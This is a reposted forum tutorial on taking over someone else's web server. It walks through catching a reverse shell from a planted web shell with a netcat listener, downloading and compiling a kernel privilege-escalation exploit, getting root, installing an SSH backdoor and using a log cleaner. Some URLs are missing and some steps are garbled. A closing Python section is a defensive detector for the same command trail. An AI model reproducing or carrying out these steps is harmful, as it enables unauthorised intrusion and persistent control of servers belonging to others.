Rooting a Web Server with Netcat and a Shell
Here's a simple tutorial I found on the internet; I didn't write it myself. I tried to correct most grammar errors, but let me know if I missed any. It relies on third-party exploits and a shell, so don't expect much from it. But please reply/thank.

Things You Need:
# A Shell on a Website
# An Exploit
# Log cleaner
# SSH Backdoor
# Netcat

Use Google Dorks to find shells.
Once you find a shell, open a command prompt and go to the Netcat path. Type
"cd netcat.exe"

OK, open your shell in your browser and go to the back connection tab. If it is not there, get a shell like "WSO 2.3" or any other;
that's your choice.

Specify your "ip & port as 2121". Press connect; now you'll get a shell to the server, and you can give commands to the server through that shell.

Now come back to Netcat and type "nc -l -v -p 2121"

It will give you this output:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting the right exploit for the servers

Type: uname -a & hit enter.
It'll look something like this:

[[email protected] /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You will have noted that it shows the kernel version of the server is: 2.6.18-194.26.1.el5
& the year is 2010.

You need to find a perfect exploit for it. You can find them at:-

Compiling & executing exploits

Now I've got an exploit, & it is written in C, so I can't execute it by just uploading it; I need to compile it.

Before proceeding further, cd into the tmp directory, because it is always writable. So type: cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, so I type: wget
// Note: There is no such site, I'm just taking it to show you.
It'll look something like this:

[email protected] /home/target_usernemr/public_html/tmp]$ wget
--2011-01-25 08:21:43--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'

Now change the permission of the exploit to 777.
Type: "chmod 777 exploit.c"

Now the exploit is on my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

The next step is to execute it, so we'll type: "./exploit"

Here it'll show different processes...
: #
: #
got root you m0f0 !! [<example]

Now it says got root. Let's check whether it is true.
Type: "whoami"

Then it will say "root"

like: uid=0(root) gid=0(root) groups=0(root)

Type "su" to get full privileges!

Installing Backdoors
Type: "wget"

Then type,
cd sshdoor

Now connect with PuTTY and enjoy root privileges.

Methods to execute exploits written in other languages:
C exploit
gcc -o exploit exploit.c
chmod +x exploit

Perl Exploits


php exploit.php
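
The command sequence in the post above leaves a recognisable trail in process-execution logs. As an added example (not part of the original post), this sketch flags that trail from the defender's side; the record format, the account names in WEB_USERS and the sample lines are constructed assumptions.

```python
import re
import shlex

# Constructed sample of process-execution records (format is an assumption:
# "time user=<name> cwd=<dir> cmd=<command line>"), mirroring the steps in the post.
SAMPLE_LOG = """\
08:21:40 user=apache cwd=/home/site/public_html/cgi-bin cmd=uname -a
08:21:43 user=apache cwd=/home/site/public_html/tmp cmd=wget http://files.example.invalid/exploit.c
08:21:50 user=apache cwd=/home/site/public_html/tmp cmd=chmod 777 exploit.c
08:21:55 user=apache cwd=/home/site/public_html/tmp cmd=gcc -o exploit exploit.c
08:22:01 user=apache cwd=/home/site/public_html/tmp cmd=./exploit
08:22:05 user=root cwd=/home/site/public_html/tmp cmd=whoami
09:00:00 user=deploy cwd=/srv/build cmd=gcc -o app main.c
"""

WEB_USERS = {"apache", "www-data", "nginx", "nobody"}  # assumed service accounts
RECORD = re.compile(r"^(\S+) user=(\S+) cwd=(\S+) cmd=(.+)$")

def classify(user, cwd, cmd):
    """Return a finding label for one record, or None if it looks benign."""
    argv = shlex.split(cmd)
    prog = argv[0].rsplit("/", 1)[-1]
    in_webroot = "/public_html/" in cwd + "/"
    if user in WEB_USERS:
        if prog in {"wget", "curl"}: return "web user downloads file"
        if prog in {"gcc", "cc"}: return "web user compiles code"
        if prog == "chmod" and "777" in argv[1:]: return "web user sets mode 777"
        if argv[0].startswith("./"): return "web user runs local binary"
        if prog in {"uname", "id", "whoami"}: return "web user recon command"
    elif user == "root" and in_webroot:
        return "root process with cwd in web root"
    return None

def scan(log_text):
    """Parse the log and return (time, finding) for every suspicious record."""
    findings = []
    for line in log_text.splitlines():
        m = RECORD.match(line)
        if m:
            ts, user, cwd, cmd = m.groups()
            label = classify(user, cwd, cmd)
            if label:
                findings.append((ts, label))
    return findings

if __name__ == "__main__":
    for ts, label in scan(SAMPLE_LOG):
        print(ts, label)
```

A web-server account that downloads, compiles and runs a binary within a few seconds, followed by a root process whose working directory is inside the web root, is the pattern worth alerting on; any single finding alone is weaker evidence.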
